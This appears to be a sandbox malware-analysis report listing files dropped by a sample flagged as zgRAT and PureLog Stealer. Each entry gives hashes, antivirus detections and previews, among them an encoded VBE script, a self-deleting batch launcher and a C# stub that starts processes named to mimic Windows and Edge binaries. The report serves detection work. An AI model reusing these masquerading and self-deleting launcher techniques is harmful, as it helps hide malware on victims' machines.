SSDEEP:	12:CedLScI8tv8yZ5BVzXdPkdtU4GQKPYHsrg:CetSD8t75BVpPUtU4qP9rg
MD5:	140D291237548913AE76416D89F273D0
SHA1:	9AC5FFE6834DEF7FAC5008E3EF88AD89C84D0383
SHA-256:	E451C9E799610ECFAEE17DA3A801022B32FF00251680A1DE7C5B31FD53229711
SHA-512:	A662D75F52A363F7537CE7A08B9686294DB04712F2321EB4AB797D2A25E75CA823FA3120ED5EA7ED6066A4C7B8C299AA819B898B33CBA4AA22D3ED2DBAB6B26E
Malicious:	false
Preview:	iOp9tgARqnowxDV6cyZ5J8KtoK3Y22L01pMXvuXcjR4oOrX926Aob6RjD5UjmmZycy5H18Lrb7V1Ege7x4f51hY4YmT0Zxz72FMavPH4vSNekZfhaXwsHe75aAsPoVSnHX98UEMhxlJiT4U8GwZCBH0XIR9uh1PaAkWMahNWKP5gVYlgqtJ25QlAhlzDEbA5VsishHijjD1wMUCupdDxsWeu9VpyrJRtO9Kmz38jLkT2YyyNjFXkXMM8NytMbt1ZvIhMKZ4wfelIDmVKgcPlwqVCwLZBJvIcs4GQRlCKKlF3lE5lcjp9eQnFwfa8A3mtWJaJfF35ZEaKlcasPxikGI8cRBdvLEKR9VhcowFXpujZzceUErsMVBnNK71elHtV4JLP58DdrK4WjinygJreV757sURq4lviBOfpRPZGoPe

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	data
Category:	dropped
Size (bytes):	229
Entropy (8bit):	5.838240404374592
Encrypted:	false
SSDEEP:	6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
MD5:	569A28CF34F3A51DB0CC4AA0369773EC
SHA1:	23488377EA3A37B61750952D541B867AB3D8B424
SHA-256:	86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
SHA-512:	3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFX!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.968079981014333
Encrypted:	false
SSDEEP:	3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
MD5:	68B1414DBD5A51F2F75912513D1A035E
SHA1:	A45E03F8EDADA7FDF3697EAA6D88785CD464D373
SHA-256:	48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
SHA-512:	AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
Malicious:	false
Preview:	%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%

C:\Edge\msedge.exe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9015551915024087
Encrypted:	false
SSDEEP:	48:62mBthxZ8RxeOAkFJOcV4MKe28dvcvqBHbuulB+hnqXSfbNtm:MexvxVx9EvkNTkZzNt
MD5:	CCB9DE638E1E5A4C636D24E89AF354B9
SHA1:	873673E2AC88DD0F056251850432201BAE9C0C4A
SHA-256:	EE7B30A37C30E937633978D4731292973F4C9BAF5498435E0C932AB9373D9197
SHA-512:	2BEBEB3C207F32BBEC96CA2FA7CD412837625F5FFC93D8D8B6EFD1F0C5A19B9F9E1CC8E1228CB073472E492A13D7103D2EC29DAE6412B16070A9DFE32B747EA8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Users\user\AppData\Local\24dbde2999530e

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	121
Entropy (8bit):	5.532724605763097
Encrypted:	false
SSDEEP:	3:yIULrjizTxoKBqQgY/BvXIP9DY8cUprXLrkB9:yIU3WXe4lIPhYVL
MD5:	86307C75705630C6666DD4EB2E37E217
SHA1:	62407FCEA4E47CB677CF610B9D6B723DA15FB4D8
SHA-256:	00D3FC5EBA4546B27C44B621BA40AA19E3AFCCE11053B3B9C9E41036C5018EA9
SHA-512:	FB0902E8C1F17DEDE98F9C62810EC6F313488301598DA7E7052812B6EE4DBDDD4DE9AFE8763F7AB5CDCCF1AD419C04C66FC67FF04C5F03EAD2E5206DBC017595
Malicious:	false
Preview:	QnmUD7cZP96NNglqWiGYVVUC7gRtkzGdu0cqpW1oSIwPjbEsyZRqYwv5SjXgptzZ3cdXE4BArbGNjFdfcj5LiZF8FgXF9U8jTWVG8rn3XQ86phWNF1EGxn1dX

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.172201104510006
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1CHyg4E2J5yIM2dASBktKcKZG1CHyg4E2J5xAIdVy:hCRLuVFOOr+DE1CHhJ23yIMmKOZG1CHB
MD5:	014C8989C3A393F4BC33C1184E91F334
SHA1:	1AA358FD58EEBA7FDE6F84975FA4EC0C64661F82
SHA-256:	C98ED425289C19B70A24B1AC32D3FAE7EB03E5884927CAF324B92BFE40F50285
SHA-512:	902622F54B151D6FB637A8165EA1889D72CCCCF05684A55141D1B844204359299360D96B878E60BF03A5352CFA402A267AE1A21603A2A5846753E4221DEFA1F7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\FVbPldJoKd.bat"

C:\Users\user\AppData\Local\Temp\RES8FC0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c0, 10 symbols, created Mon Sep 30 17:53:27 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1912
Entropy (8bit):	4.5958119355088
Encrypted:	false
SSDEEP:	48:qaLzFd799NK80slmuulB+hnqXSfbNtmhr:9n71K80s2TkZzNtyr
MD5:	7D74BC22FE701F8C7E78D6F9ADD6B3FF
SHA1:	3BF55E5FF71E294665C009F8D4EE77706B97C8AD
SHA-256:	56FD56F457BF1C2BC5170E97BE68F910B8B9CF4EEB816A324645B4A8A683FE1B
SHA-512:	0529AE493ABF457CDD42C0BED9961738005A279C866FB67633D2F38FA96C34C6BE84B683B1B28E9542DD3C91CEF39000C92ACF368E3B7FDF5BB66738C6E2FDC9
Malicious:	false
Preview:	L......f.............debug$S........H...................@..B.rsrc$01................t...........@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES8FC0.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.

C:\Users\user\AppData\Local\Temp\RES9270.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d8, 10 symbols, created Mon Sep 30 17:53:27 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1936
Entropy (8bit):	4.551788195121404
Encrypted:	false
SSDEEP:	24:Hha9wnOOgHJwK80NaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+OUZ:1fgSK80EluOulajfqXSfbNtmhJZ
MD5:	BA9EA25BD28A2C28C5C1AC699CBF5BD6
SHA1:	D0287F8982064931A57A8F958A5439923F2C49FF
SHA-256:	AEC6D42BE05C2D52731D4E1811DD93BFA1F468C69B6D62A41F1356C9CF34758D
SHA-512:	97F7DB76E4799A0704285EAE4EEF4F90A130A13FBF05EF9D2E4AE59FF8050FBF6B5D1544A6A22F98E1B3A40613B64BADE1F096A1F7D342409F4C97C707663D57
Malicious:	false
Preview:	L......f.............debug$S........(...................@..B.rsrc$01................T...........@..@.rsrc$02........p...h...............@..@........;....c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP...................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES9270.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.

C:\Users\user\AppData\Local\Temp\Rih6BXcg3M

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:p2FVrtuuW/:6tuuW/
MD5:	7DC1E85CE6B28F69D9457E8AE7647896
SHA1:	404124EEC0003FF9C0C9A69112F82D8E4EE3B7B9
SHA-256:	2EEC1A338A73D4E5E3B0417DBF92DFD885D7D0B37E06C8D4144DDB4110176862
SHA-512:	2604254C15AE9A951A22DAF5E80892B9C2E7741D595AF3A1458B049E9E9737519F0DD8EF89BD2C29B48F7A6876BA9AF3BFAD012229A881A99B2F5B73E43B2D1F
Malicious:	false
Preview:	tXhv5CyRaIShKKAHQ2vqf2sdZ

C:\Users\user\AppData\Local\Temp\SbTZcnTXHu

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:zKI30Kn:eIkKn
MD5:	4CA07FA17C4212E66E1DA1625708613A
SHA1:	12B7A2E64407290D95EF34D5588BB42989A8821F
SHA-256:	2DCBCC6082E3E5A57936C754C9D9A9CF15EE117A638EBB8964E0D3B8B24F8C69
SHA-512:	F8F88736EF250497455C63D804B83299653A2F3A142B46DB50B0A284650CFC7B3BCA1BEDC681E80530686FFD287E9C14EE84C9AE825783B2B79BB8D7D5B0F69E
Malicious:	false
Preview:	zyk4cw6cf6gnt4jrrbj1D7yM2

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mch301s.edx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wwfpnb5.zno.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxbdznrq.xst.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvh20is1.1oo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdpn43sw.qek.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qp4jqzaq.s4v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryh10i20.2xc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgwv1ccq.rlb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	389
Entropy (8bit):	4.960722582391966
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLy4BiFkD:JNVQIbSfhV7TiFkMSfh+9FkD
MD5:	BA482B6AE07CFEFEB8E0DF7F06E7C93B
SHA1:	FE2E0BF2A08292566F0E4456AD177EEAB372E718
SHA-256:	4419C012D60CEE0E4F7E8F5A9EEF97976334424813D8121934295ACFCC598037
SHA-512:	56D2ED7A07EC144667098F752DC63F99795A63B29A3B3CEBCE19DAF6A86F20D9EC03A5675F035A0C5B6BA5A44FC737690197488D97B10A57E31D4DBB9AA94371
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\WmiPrvSE.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	251
Entropy (8bit):	5.106155237018697
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8oCHhJ23fpOxkWw9:Hu7L//TRq79cQDhX
MD5:	88574858A72DAB9106B8F3BCB6E2BCB6
SHA1:	692A642FA3B4B4B015F916C1B2FF2196EFA2E61C
SHA-256:	134D48D8D57219FF67B77EE825EB47B504B0955A616CAC92C0A990DB997487A6
SHA-512:	5E7A25F05AD63C58B78193E4D2F98F9CB109682DDB3B6072808406E6D588FC3A6C61E5C4A33CABB46764FEF96291A247BC0261679C382E44E89818FE36DB2A3B
Malicious:	false
